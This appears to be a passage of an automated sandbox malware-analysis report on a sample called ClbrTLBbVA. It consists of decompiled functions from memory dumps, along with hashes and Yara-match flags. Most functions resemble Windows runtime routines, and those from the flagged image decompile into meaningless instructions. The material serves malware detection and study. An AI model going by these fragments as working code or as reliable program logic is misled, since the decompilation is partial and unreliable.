                                        
                                        				_t29 = __edx;
                                        				_v8 =  *0x179d360 ^ _t32;
                                        				_v20 = _a4;
                                        				_v12 = _a8;
                                        				_v24 = __ecx;
                                        				_v16 = __edx;
                                        				_v50 = 0x1021;
                                        				if(E016C7D50() == 0) {
                                        					_t18 = 0x7ffe0380;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                        				}
                                        				_push( &_v56);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                        			}
















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016CC577(void* __ecx, char _a4) {
                                        				void* __esi;
                                        				void* __ebp;
                                        				void* _t17;
                                        				void* _t19;
                                        				void* _t20;
                                        				void* _t21;
                                        
                                        				_t18 = __ecx;
                                        				_t21 = __ecx;
                                        				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E016CC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x16811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                        					__eflags = _a4;
                                        					if(__eflags != 0) {
                                        						L10:
                                        						E017788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                        						L9:
                                        						return 0;
                                        					}
                                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                        					if(__eflags == 0) {
                                        						goto L10;
                                        					}
                                        					goto L9;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}










                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E01778D34(intOrPtr __ecx, intOrPtr __edx) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				short _v42;
                                        				char _v48;
                                        				signed char* _t12;
                                        				intOrPtr _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t25;
                                        				signed int _t26;
                                        
                                        				_t23 = __edx;
                                        				_v8 =  *0x179d360 ^ _t26;
                                        				_v16 = __ecx;
                                        				_v42 = 0x1c2b;
                                        				_v12 = __edx;
                                        				if(E016C7D50() == 0) {
                                        					_t12 = 0x7ffe0386;
                                        				} else {
                                        					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v48);
                                        				_push(8);
                                        				_push(0x20402);
                                        				_push( *_t12 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                        			}














                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f44f1ab53b42518a5278f85f183479bcf8365a3a214fa12d9052ab9c40109be
                                        • Instruction ID: e7c706d24ef92b815be38d3272b1a8bc963d9e34905dc3b695eeb74870efd28c
                                        • Opcode Fuzzy Hash: 4f44f1ab53b42518a5278f85f183479bcf8365a3a214fa12d9052ab9c40109be
                                        • Instruction Fuzzy Hash: 07F0B470A04609AFDB14EFB8D945A6EB7B4EF18700F508099E905EB280DA34D900CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E01762073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                        				void* __esi;
                                        				signed char _t3;
                                        				signed char _t7;
                                        				void* _t19;
                                        
                                        				_t17 = __ecx;
                                        				_t3 = E0175FD22(__ecx);
                                        				_t19 =  *0x179849c - _t3; // 0x2f2690f
                                        				if(_t19 == 0) {
                                        					__eflags = _t17 -  *0x1798748; // 0x0
                                        					if(__eflags <= 0) {
                                        						E01761C06();
                                        						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                        						__eflags = _t3;
                                        						if(_t3 != 0) {
                                        							L5:
                                        							__eflags =  *0x1798724 & 0x00000004;
                                        							if(( *0x1798724 & 0x00000004) == 0) {
                                        								asm("int3");
                                        								return _t3;
                                        							}
                                        						} else {
                                        							_t3 =  *0x7ffe02d4 & 0x00000003;
                                        							__eflags = _t3 - 3;
                                        							if(_t3 == 3) {
                                        								goto L5;
                                        							}
                                        						}
                                        					}
                                        					return _t3;
                                        				} else {
                                        					_t7 =  *0x1798724; // 0x0
                                        					return E01758DF1(__ebx, 0xc0000374, 0x1795890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                        				}
                                        			}








                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 86d48f74acb0331e1c002588a57689fbe1938b3b523f69ca7701e0850f5fee94
                                        • Instruction ID: ced0f52520472a37facab44bc152f6a30d884633693889e8dc69d70fb86758ae
                                        • Opcode Fuzzy Hash: 86d48f74acb0331e1c002588a57689fbe1938b3b523f69ca7701e0850f5fee94
                                        • Instruction Fuzzy Hash: F9F0202A4252894ADFB36B2830142E5FB8ADB9A120B094886DC901720FC8358887CB22
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E016E927A(void* __ecx) {
                                        				signed int _t11;
                                        				void* _t14;
                                        
                                        				_t11 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                        				if(_t11 != 0) {
                                        					E016EFA60(_t11, 0, 0x98);
                                        					asm("movsd");
                                        					asm("movsd");
                                        					asm("movsd");
                                        					asm("movsd");
                                        					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                        					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                        					E016E92C6(_t11, _t14);
                                        				}
                                        				return _t11;
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                        • Instruction ID: 9940365db007fe2c477cc019b49ce4ff9da701f27dd8934640f3df827427781a
                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                        • Instruction Fuzzy Hash: 2FE02B323515016BEB219E0ACC88F1337AEDFD2724F00407CB9001E242CAE5DC0887A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E016C746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                        				signed int _t8;
                                        				void* _t10;
                                        				short* _t17;
                                        				void* _t19;
                                        				intOrPtr _t20;
                                        				void* _t21;
                                        
                                        				_t20 = __esi;
                                        				_t19 = __edi;
                                        				_t17 = __ebx;
                                        				if( *((char*)(_t21 - 0x25)) != 0) {
                                        					if(__ecx == 0) {
                                        						E016BEB70(__ecx, 0x17979a0);
                                        					} else {
                                        						asm("lock xadd [ecx], eax");
                                        						if((_t8 | 0xffffffff) == 0) {
                                        							_push( *((intOrPtr*)(__ecx + 4)));
                                        							E016E95D0();
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                        							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                        							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                        						}
                                        					}
                                        					L10:
                                        				}
                                        				_t10 = _t19 + _t19;
                                        				if(_t20 >= _t10) {
                                        					if(_t19 != 0) {
                                        						 *_t17 = 0;
                                        						return 0;
                                        					}
                                        				}
                                        				return _t10;
                                        				goto L10;
                                        			}










                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc648e52ce3004e1b69bacda1f27ec96119181ff6a4eeb9c69f34cff157c97f7
                                        • Instruction ID: ba0b16458f0cedc94933b2f5c6853be81657b1e1296696ef5bc9cde3f32ed8a5
                                        • Opcode Fuzzy Hash: dc648e52ce3004e1b69bacda1f27ec96119181ff6a4eeb9c69f34cff157c97f7
                                        • Instruction Fuzzy Hash: DEF0BE34912245EADF129B6CCC40BBAFFA2EF04A10F04825DD891EB2A1E7259801CF99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 36%
                                        			E01778CD6(intOrPtr __ecx) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				short _v38;
                                        				char _v44;
                                        				signed char* _t11;
                                        				intOrPtr _t17;
                                        				intOrPtr _t22;
                                        				intOrPtr _t23;
                                        				intOrPtr _t24;
                                        				signed int _t25;
                                        
                                        				_v8 =  *0x179d360 ^ _t25;
                                        				_v12 = __ecx;
                                        				_v38 = 0x1c2d;
                                        				if(E016C7D50() == 0) {
                                        					_t11 = 0x7ffe0386;
                                        				} else {
                                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v44);
                                        				_push(0xffffffe4);
                                        				_push(0x402);
                                        				_push( *_t11 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                        			}














                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6358588cb6c1b6432541844a4b484dc0073d57459e96472afeba6739e5d8779b
                                        • Instruction ID: d332800a1fb23d71d8cb32d043ab793851fd840550ee0e540343383e6f08acd4
                                        • Opcode Fuzzy Hash: 6358588cb6c1b6432541844a4b484dc0073d57459e96472afeba6739e5d8779b
                                        • Instruction Fuzzy Hash: E1F08271A05609ABDF04DBB8E95AE6EB7B4EF18300F50019DE916EB280EA34D940CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 36%
                                        			E01778B58(intOrPtr __ecx) {
                                        				signed int _v8;
                                        				intOrPtr _v20;
                                        				short _v46;
                                        				char _v52;
                                        				signed char* _t11;
                                        				intOrPtr _t17;
                                        				intOrPtr _t22;
                                        				intOrPtr _t23;
                                        				intOrPtr _t24;
                                        				signed int _t25;
                                        
                                        				_v8 =  *0x179d360 ^ _t25;
                                        				_v20 = __ecx;
                                        				_v46 = 0x1c26;
                                        				if(E016C7D50() == 0) {
                                        					_t11 = 0x7ffe0386;
                                        				} else {
                                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v52);
                                        				_push(4);
                                        				_push(0x402);
                                        				_push( *_t11 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                        			}














                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce75627a63af39cc049a0f2bd6592c94d15560155c7881a0533d7ea997bcf981
                                        • Instruction ID: 675333972b2808359645bf39cc6f9298d0425620ef7be9497c7a2bcb1cb18fad
                                        • Opcode Fuzzy Hash: ce75627a63af39cc049a0f2bd6592c94d15560155c7881a0533d7ea997bcf981
                                        • Instruction Fuzzy Hash: 4FF082B1A05259ABDF10EBA8D90AE7EB7B4EF14700F44059DBA05DB390EA34E900C799
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016A4F2E(void* __ecx, char _a4) {
                                        				void* __esi;
                                        				void* __ebp;
                                        				void* _t17;
                                        				void* _t19;
                                        				void* _t20;
                                        				void* _t21;
                                        
                                        				_t18 = __ecx;
                                        				_t21 = __ecx;
                                        				if(__ecx == 0) {
                                        					L6:
                                        					__eflags = _a4;
                                        					if(__eflags != 0) {
                                        						L8:
                                        						E017788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                        						L9:
                                        						return 0;
                                        					}
                                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                        					if(__eflags != 0) {
                                        						goto L9;
                                        					}
                                        					goto L8;
                                        				}
                                        				_t18 = __ecx + 0x30;
                                        				if(E016CC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1681030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                        					goto L6;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}










                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 86aa357c70bd6d5554aacbbf363a2d61b4a6525cee4b8d1f4d96363454f327de
                                        • Instruction ID: 6547a9e46a0b378496feb4967d5aec9be88b2a807758ccd067286a327e52036a
                                        • Opcode Fuzzy Hash: 86aa357c70bd6d5554aacbbf363a2d61b4a6525cee4b8d1f4d96363454f327de
                                        • Instruction Fuzzy Hash: DFF0BE32525F84CFD773DB1CCD44B22F7D8AB006B8F445568E405879A2CB24EC40C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016DA44B(signed int __ecx) {
                                        				intOrPtr _t13;
                                        				signed int _t15;
                                        				signed int* _t16;
                                        				signed int* _t17;
                                        
                                        				_t13 =  *0x1797b9c; // 0x0
                                        				_t15 = __ecx;
                                        				_t16 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                        				if(_t16 == 0) {
                                        					return 0;
                                        				}
                                        				 *_t16 = _t15;
                                        				_t17 =  &(_t16[2]);
                                        				E016EFA60(_t17, 0, _t15 << 2);
                                        				return _t17;
                                        			}








                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd5882a6026c2bb88600e5bde2cf13705001bed79af83e946f57dd7c132229ea
                                        • Instruction ID: 2e020f510a07c269bc17703895b58da3d2e2554d1e6512a63fea233e81864b01
                                        • Opcode Fuzzy Hash: bd5882a6026c2bb88600e5bde2cf13705001bed79af83e946f57dd7c132229ea
                                        • Instruction Fuzzy Hash: 74E09272A12421ABD2219A58ED00F6673AEDBE4A51F0A403DFA04C7214DA28DD02C7E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E016AF358(void* __ecx, signed int __edx) {
                                        				char _v8;
                                        				signed int _t9;
                                        				void* _t20;
                                        
                                        				_push(__ecx);
                                        				_t9 = 2;
                                        				_t20 = 0;
                                        				if(E016DF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                        					_t20 = L016C4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                        				}
                                        				return _t20;
                                        			}







                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                        • Instruction ID: 9815bd0aef6ba88c4d815a1e7876aa70314eca8ceda7d52e80842507542ab330
                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                        • Instruction Fuzzy Hash: 33E0DF32A40228FBDB31AAD99E05FAABFBDDB98A60F0101D9FA04D7150D9609E00C6D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0041731A(void* __ebx, signed int* __edx) {
                                        				signed char _t3;
                                        				signed char _t5;
                                        
                                        				asm("scasb");
                                        				asm("int 0xa");
                                        				_push(__edx);
                                        				asm("stosd");
                                        				_t5 = _t3;
                                        				asm("insb");
                                        				asm("fild qword [eax]");
                                        				 *__edx =  *__edx | _t5;
                                        				return _t5;
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3645f962cfcd3dbfb13725cdefc3a7d235bc66ad4ddc4b7ea03400e7386ce8a8
                                        • Instruction ID: 8c9a36d7994ce01adbfc0095581615dd7bfcc92d07168f78a5bd43b3028f87b8
                                        • Opcode Fuzzy Hash: 3645f962cfcd3dbfb13725cdefc3a7d235bc66ad4ddc4b7ea03400e7386ce8a8
                                        • Instruction Fuzzy Hash: A2D02287E99291088A02CCACB88C075FF60DE83039B2213CFCD44A78474402C10222CA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016BFF60(intOrPtr _a4) {
                                        				void* __ecx;
                                        				void* __ebp;
                                        				void* _t13;
                                        				intOrPtr _t14;
                                        				void* _t15;
                                        				void* _t16;
                                        				void* _t17;
                                        
                                        				_t14 = _a4;
                                        				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x16811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                        					return E017788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                        				} else {
                                        					return E016C0050(_t14);
                                        				}
                                        			}











                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40c90a7b5be50a6f21d49497d20f51b0f3ab00c450b89f2ede51faa74f7dbcc8
                                        • Instruction ID: 75bebaa046d797ddc7bb8432b4c8fe6a7054a851f28501a2b22ce6eb4c7b939f
                                        • Opcode Fuzzy Hash: 40c90a7b5be50a6f21d49497d20f51b0f3ab00c450b89f2ede51faa74f7dbcc8
                                        • Instruction Fuzzy Hash: 03E065B06052049EDB259E5DDC84BA57B9CDB52721F1A819DE0084B223CB21D881C38A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E017341E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				void* _t5;
                                        				void* _t14;
                                        
                                        				_push(8);
                                        				_push(0x17808f0);
                                        				_t5 = E016FD08C(__ebx, __edi, __esi);
                                        				if( *0x17987ec == 0) {
                                        					E016BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                        					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                        					if( *0x17987ec == 0) {
                                        						 *0x17987f0 = 0x17987ec;
                                        						 *0x17987ec = 0x17987ec;
                                        						 *0x17987e8 = 0x17987e4;
                                        						 *0x17987e4 = 0x17987e4;
                                        					}
                                        					 *(_t14 - 4) = 0xfffffffe;
                                        					_t5 = L01734248();
                                        				}
                                        				return E016FD0D1(_t5);
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8613ea45d83f2bc5f5c640526fc29de93b5d3b7f3f233aafc66ff049c16e525e
                                        • Instruction ID: a3a979c1f12d2df3d3f509a726aeb099885ff7a97c298c274620ccb3cb55f5c5
                                        • Opcode Fuzzy Hash: 8613ea45d83f2bc5f5c640526fc29de93b5d3b7f3f233aafc66ff049c16e525e
                                        • Instruction Fuzzy Hash: 0DF03278864709DFCBB0EFE9E90470CB6B5F796320F00812F9105972AAC73444AACF06
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0175D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                        				void* _t5;
                                        
                                        				if(_a4 != 0) {
                                        					_t5 = L016AE8B0(__ecx, _a4, 0xfff);
                                        					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                        					return _t5;
                                        				}
                                        				return 0xc000000d;
                                        			}





                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                        • Instruction ID: f64d80576ca308256680afba3958557964ffa7269a86844620f2b6df3d5689bb
                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                        • Instruction Fuzzy Hash: 23E0C231280209FBEB325E84CC00F79BB17DB50BA0F104035FE085A692C6B19C91DAD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016DA185() {
                                        				void* __ecx;
                                        				intOrPtr* _t5;
                                        
                                        				if( *0x17967e4 >= 0xa) {
                                        					if(_t5 < 0x1796800 || _t5 >= 0x1796900) {
                                        						return L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                        					} else {
                                        						goto L1;
                                        					}
                                        				} else {
                                        					L1:
                                        					return E016C0010(0x17967e0, _t5);
                                        				}
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80ffad86587f8f331d1b32ac7df8ebe72c8e1831b03e0146c24ad11c719912b4
                                        • Instruction ID: a714d05a880b61f6128e15ee0cfce4cedf5648453314a940117666527c3c1de7
                                        • Opcode Fuzzy Hash: 80ffad86587f8f331d1b32ac7df8ebe72c8e1831b03e0146c24ad11c719912b4
                                        • Instruction Fuzzy Hash: 12D02B7156800056CB2E2360AD14F353223F780BA1F34461CF2070B5A0E960C8DDD10C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016D16E0(void* __edx, void* __eflags) {
                                        				void* __ecx;
                                        				void* _t3;
                                        
                                        				_t3 = E016D1710(0x17967e0);
                                        				if(_t3 == 0) {
                                        					_t6 =  *[fs:0x30];
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                        						goto L1;
                                        					} else {
                                        						return L016C4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                        					}
                                        				} else {
                                        					L1:
                                        					return _t3;
                                        				}
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49b369c5b4a41ec918eb50b29f374f2c818993ef39d62024a5c5e6f6124bf77c
                                        • Instruction ID: 23a2bb995bdeb8206f7e1cba14d2e8fb1f414252ac429e8b546f854ce1e5cb5a
                                        • Opcode Fuzzy Hash: 49b369c5b4a41ec918eb50b29f374f2c818993ef39d62024a5c5e6f6124bf77c
                                        • Instruction Fuzzy Hash: FED0A77110014192EE2D5B159C14B242662EB91B81F38006CF217495D0CFF0CC92E04C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E00416CE8(void* __eax, void* __ebx, void* __edx, void* __edi) {
                                        
                                        				 *(__edi - 0x47) =  *(__edi - 0x47) | 0x000000a1;
                                        				asm("arpl [esi-0x1d], bp");
                                        				return __eax;
                                        			}



                                        0x00416cea
                                        0x00416cef
                                        0x00416cfc

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c236d8022112054e8c86cf38dbed7f4d4c0a57f8d8d0601d7bbb32d221065ec5
                                        • Instruction ID: 52999429e9aac05e6a173bf50d827596504a78e5b1407a272d65d4c2de4b9197
                                        • Opcode Fuzzy Hash: c236d8022112054e8c86cf38dbed7f4d4c0a57f8d8d0601d7bbb32d221065ec5
                                        • Instruction Fuzzy Hash: 71C02B1BE195180062348F0C7C000F4F320F9C3235E10A7EBC858338804141D01402C9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016D35A1(void* __eax, void* __ebx, void* __ecx) {
                                        				void* _t6;
                                        				void* _t10;
                                        				void* _t11;
                                        
                                        				_t10 = __ecx;
                                        				_t6 = __eax;
                                        				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                        					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                        				}
                                        				if( *((char*)(_t11 - 0x1a)) != 0) {
                                        					return E016BEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                        				}
                                        				return _t6;
                                        			}







                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                        • Instruction ID: bf71dadbf6f806008e957cd3b12ca3d9b1cb8c16abffe2e9c893f75667b19f6b
                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                        • Instruction Fuzzy Hash: 82D0A9B1C011829AEB02AF14CE187A83BB2BB00208FD820A980060EB52C33A4A4AC706
                                        Uniqueness

